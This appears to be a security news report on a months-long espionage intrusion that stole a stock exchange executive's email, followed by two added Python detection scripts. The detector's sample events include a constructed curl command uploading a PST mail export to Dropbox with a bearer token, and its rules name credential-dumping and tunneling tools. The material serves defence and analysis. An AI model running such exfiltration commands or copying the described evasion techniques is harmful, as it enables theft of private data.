"By the time defenders noticed anything, the intruder had full control of the machine," Symantec and Carbon Black's Threat Hunter Team reported — and that control dated back to at least October 10, 2025, when two binaries were already running as SYSTEM on a senior stock exchange executive's computer.
October 10, 2025: SYSTEM-level foothold and unknown initial access
Symantec and Carbon Black's Threat Hunter Team say the first malicious activity appeared on October 10, 2025. By then the attacker was already running two binaries as SYSTEM, the highest local privilege level on Windows: one masquerading as Adobe's updater and another posing as OneDrive. How the intruder first gained access remains unknown; Symantec's assessment is that the earliest signs most likely came from lateral movement off a previously compromised device rather than from a directly observed exploit.
Mailbox stealer built on Aspose and a steady, low-noise pull schedule
The principal tool the intruder deployed was a mailbox stealer built around Aspose, a legitimate .NET library that reads Outlook OST and PST files. Compiled into a standalone executable, it was invoked each time with a password and a date-range flag and exported the executive's mailbox to a PST file on disk. The initial run pulled messages dating back to August 2025; after that the attacker returned every two to four weeks and took only the mail that had arrived since the previous pull. Symantec observed eight additional pulls through February 17, 2026, producing a near-continuous copy of the inbox sliced thin enough to stay below detection thresholds.
Exfiltration through consumer cloud services — Dropbox, OneDrive, and a brief test of temp.sh
To hide its traffic, the operation routed data through consumer cloud services. On November 12 the attacker grabbed a Dropbox API token and began uploading with curl, using both Dropbox and OneDrive Personal accounts for exfiltration. For OneDrive traffic the attacker connected to hard-coded Microsoft IP addresses rather than the onedrive.live.com hostname so perimeter tools would not see DNS lookups that could flag the activity. The intruder briefly tested the public file host temp.sh in November but then dropped it. The last observed activity was on March 19, 2026, when a new backdoor was staged but never executed — which Elias said may mean the attacker lost access soon after.
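The direct-to-IP trick described above (hard-coded Microsoft addresses instead of a onedrive.live.com lookup) is detectable precisely because the DNS query is missing. The following Python is an added example, not code from the Symantec and Carbon Black report: it correlates DNS-answer telemetry with outbound connections per host and flags any connection to an external address that the host never resolved within a lookback window. The log layout, field names, hostnames and addresses are constructed for the example; the events are loosely modelled on Sysmon event 22 (DNS query with answers) and event 3 (network connection).

```python
"""Added example (not from the Symantec/Carbon Black report): flag outbound
connections to external IPs that the same host did not resolve via DNS in the
preceding window. Log format, field names, hosts and IPs are constructed."""
from datetime import datetime, timedelta
import ipaddress
import json

# Internal ranges to ignore. Assumption: RFC 1918, loopback and link-local are
# enough for this network; a real deployment adds its own allow-list (CDNs,
# anycast resolvers, monitoring collectors, and so on).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample telemetry as JSON lines (documentation IP ranges).
SAMPLE_LOG = """
{"ts": "2025-11-12T09:00:01", "type": "dns",  "host": "WS-EXEC01", "query": "content.dropboxapi.com", "answers": ["203.0.113.10"]}
{"ts": "2025-11-12T09:00:02", "type": "conn", "host": "WS-EXEC01", "image": "curl.exe", "dst": "203.0.113.10", "dport": 443}
{"ts": "2025-11-12T09:05:00", "type": "conn", "host": "WS-EXEC01", "image": "curl.exe", "dst": "198.51.100.7", "dport": 443}
{"ts": "2025-11-12T09:05:10", "type": "conn", "host": "WS-EXEC01", "image": "OneDrive.exe", "dst": "10.0.0.5", "dport": 445}
{"ts": "2025-11-12T10:30:00", "type": "conn", "host": "WS-EXEC01", "image": "OneDrive.exe", "dst": "192.0.2.30", "dport": 443}
{"ts": "2025-11-12T10:30:05", "type": "dns",  "host": "WS-EXEC01", "query": "login.live.com", "answers": ["192.0.2.30"]}
{"ts": "2025-11-12T11:00:00", "type": "conn", "host": "WS-EXEC01", "image": "OneDrive.exe", "dst": "192.0.2.30", "dport": 443}
"""


def is_internal(ip: str) -> bool:
    """True if the address falls in one of the ignored internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_events(text: str) -> list[dict]:
    """Parse JSON lines, attach a datetime, and sort chronologically."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["when"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    events.sort(key=lambda e: e["when"])
    return events


def find_unresolved_connections(events: list[dict],
                                window: timedelta = timedelta(hours=24)) -> list[dict]:
    """Return outbound connections whose destination IP the same host did not
    resolve via DNS within `window` before the connection was made.

    Events are walked in time order on purpose: a DNS answer that arrives
    after the connection (the 10:30:00 sample) does not explain it, while the
    same address used again after the lookup (11:00:00) is not flagged.
    """
    last_resolved: dict[tuple[str, str], datetime] = {}
    alerts = []
    for ev in events:
        if ev["type"] == "dns":
            for ip in ev.get("answers", []):
                last_resolved[(ev["host"], ip)] = ev["when"]
        elif ev["type"] == "conn":
            if is_internal(ev["dst"]):
                continue
            seen = last_resolved.get((ev["host"], ev["dst"]))
            if seen is None or ev["when"] - seen > window:
                alerts.append({"ts": ev["ts"], "host": ev["host"],
                               "image": ev["image"], "dst": ev["dst"],
                               "dport": ev["dport"]})
    return alerts


if __name__ == "__main__":
    for a in find_unresolved_connections(parse_events(SAMPLE_LOG)):
        print(f"{a['ts']} {a['host']} {a['image']} -> {a['dst']}:{a['dport']} "
              "(no prior DNS resolution on this host)")
```

Two caveats for production use: endpoints that resolve through DNS over HTTPS, or through a resolver whose logs are not collected, will look like direct-to-IP traffic and need a separate allow-list, and the lookback window must be long enough to cover cached answers (a day is a reasonable starting point, with the TTL-aware refinement left to the deployment).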
Wider intrusion kit observed: tunneling, credential dumps, and UAC bypass
Symantec's indicators point to a broader toolkit beyond the mailbox grabber. Observed components include FRPC for tunneling traffic out, Secretsdump for extracting Windows credentials, SharpDecryptPwd for recovering saved application passwords, and a tool to bypass Windows User Account Control. The report does not specify how each piece was used in this intrusion, and none of these tools tie the operation to a named threat actor.
What this means for exchanges, regulators, and security teams
- Exchanges and senior executives: An executive inbox can contain non-public listing details, enforcement matters, deal terms, market-moving plans, calendars and contacts — making a single mailbox a high-value target. Five months of quiet access can provide a detailed read on an organization's plans without needing broad access to other systems.
- Regulators and oversight bodies: This was an espionage-style operation rather than a theft-for-profit incident; Symantec said the commands indicate intelligence collection. No exploited CVE has been identified, so the intrusion does not map to a missing patch, and with the initial access still unknown, patching alone cannot be assumed to have stopped it. That shifts the burden toward monitoring privileged accounts and outbound telemetry.
- Security teams and incident responders: The tactic of blending exfiltration into normal cloud activity — using Dropbox and OneDrive and hard-coded IPs to avoid DNS logs — underscores the need to watch for behavior, not just signatures. Symantec recommends feeding the reported hashes into detection tooling and watching for unusual mailbox export activity, odd Outlook access, uploads to personal cloud accounts, unexpected tunneling, and credential-dumping on systems tied to privileged users.
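The watch items above, together with the mailbox-export pattern described earlier (a non-Outlook binary reading OST files and writing PST exports), can be expressed as a small rule set over endpoint events. The Python below is an added example and not the report's own detection content: it runs five rules over constructed process-creation and file-write records and matches file hashes against an indicator set. The hash in IOC_SHA256, the image paths, user names and command lines are placeholders; a real deployment substitutes the indicators published by Symantec and Carbon Black and tunes the user-writable path list to its own environment.

```python
"""Added example, not the report's detection content: behavioural rules plus
IOC hash matching over constructed endpoint events. All hashes, paths, users
and command lines below are placeholders."""
import ntpath
import re

# Placeholder indicator set (NOT the report's hashes); lower-case SHA-256 assumed.
IOC_SHA256 = {"0" * 63 + "1"}

# Tool names from the wider kit the report lists, matched on image basename.
KNOWN_TOOL_IMAGES = {"frpc.exe", "secretsdump.exe", "sharpdecryptpwd.exe"}

# Command-line uploaders and the cloud API hostnames worth flagging in their arguments.
UPLOADER_IMAGES = {"curl.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe"}
CLOUD_API_HOSTS = ("dropboxapi.com", "api.onedrive.com", "graph.microsoft.com", "1drv.ms")

# Assumption: these prefixes are writable by a standard user on this build.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

MAIL_STORE_RE = re.compile(r"\.(pst|ost)\b", re.IGNORECASE)
BEARER_RE = re.compile(r"authorization:\s*bearer\s+\S+", re.IGNORECASE)

# Constructed sample events (process creations and one file write).
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS-EXEC01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\ProgramData\AdobeUpdate\AdobeUpdate.exe", "sha256": "0" * 63 + "1",
     "cmdline": r"AdobeUpdate.exe --store C:\Users\exec\mail.ost --from 2025-08-01 --to 2025-10-10"},
    {"type": "process", "host": "WS-EXEC01", "user": "CORP\\exec",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe -X POST https://content.dropboxapi.com/2/files/upload '
                r'-H "Authorization: Bearer sl.EXAMPLETOKEN" --data-binary @C:\ProgramData\mail_2025-11.pst'},
    {"type": "process", "host": "WS-EXEC01", "user": "CORP\\exec",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r'"OUTLOOK.EXE" "C:\Users\exec\Documents\archive.pst"'},
    {"type": "process", "host": "WS-EXEC01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Users\Public\frpc.exe", "cmdline": "frpc.exe -c frpc.ini"},
    {"type": "process", "host": "WS-EXEC01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p"},
    {"type": "file", "host": "WS-EXEC01", "user": "CORP\\exec",
     "image": r"C:\ProgramData\OneDriveUpdate.exe", "path": r"C:\ProgramData\export_2025-11.pst"},
]


def basename(ev: dict) -> str:
    return ntpath.basename(ev["image"]).lower()


def rule_hash_match(ev: dict) -> bool:
    """Image hash appears in the indicator list."""
    return ev.get("sha256", "").lower() in IOC_SHA256


def rule_known_tool(ev: dict) -> bool:
    """Image name matches a tool from the wider kit (tunneling, credential dumping, password recovery)."""
    return basename(ev) in KNOWN_TOOL_IMAGES


def rule_system_from_writable_path(ev: dict) -> bool:
    """A SYSTEM-level process started from a user-writable location."""
    return (ev.get("user", "").upper().endswith("\\SYSTEM")
            and ev["image"].lower().startswith(USER_WRITABLE_PREFIXES))


def rule_mailbox_export(ev: dict) -> bool:
    """Something other than Outlook touches an OST/PST store, by argument or by file write."""
    if basename(ev) == "outlook.exe":
        return False
    target = ev.get("cmdline", "") if ev["type"] == "process" else ev.get("path", "")
    return MAIL_STORE_RE.search(target) is not None


def rule_cloud_upload_cli(ev: dict) -> bool:
    """A command-line uploader talking to a consumer cloud API or carrying a bearer token."""
    if ev["type"] != "process" or basename(ev) not in UPLOADER_IMAGES:
        return False
    cmd = ev.get("cmdline", "")
    return any(h in cmd.lower() for h in CLOUD_API_HOSTS) or BEARER_RE.search(cmd) is not None


RULES = {
    "hash_match": rule_hash_match,
    "known_tool": rule_known_tool,
    "system_from_writable_path": rule_system_from_writable_path,
    "mailbox_export": rule_mailbox_export,
    "cloud_upload_cli": rule_cloud_upload_cli,
}


def findings_for(ev: dict) -> set[str]:
    return {name for name, fn in RULES.items() if fn(ev)}


def scan(events: list[dict]) -> list[dict]:
    """Return one finding record per event that triggered at least one rule."""
    out = []
    for ev in events:
        hits = findings_for(ev)
        if hits:
            out.append({"host": ev["host"], "image": ev["image"], "rules": sorted(hits)})
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['image']} -> {', '.join(f['rules'])}")
```

The hash rule is the only one that depends on the published indicators; the other four are behavioural and survive a recompiled binary or a new upload host, which is why the report's own advice pairs hash ingestion with watching for mailbox export, personal-cloud uploads, tunneling and credential dumping on hosts tied to privileged users.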
The campaign shows how an attacker can harvest high-value email quietly and persistently by combining a mailbox conversion tool, consumer cloud storage, and common public utilities. Attribution remains unresolved: the mix of public tooling and consumer services left little to tie the activity to a known group, a gap the researchers left open until stronger evidence appears. For organizations that sit on market-moving information, the takeaway is stark and specific — monitor the behaviors Symantec and Carbon Black have detailed, and feed their indicators into detection and response pipelines now.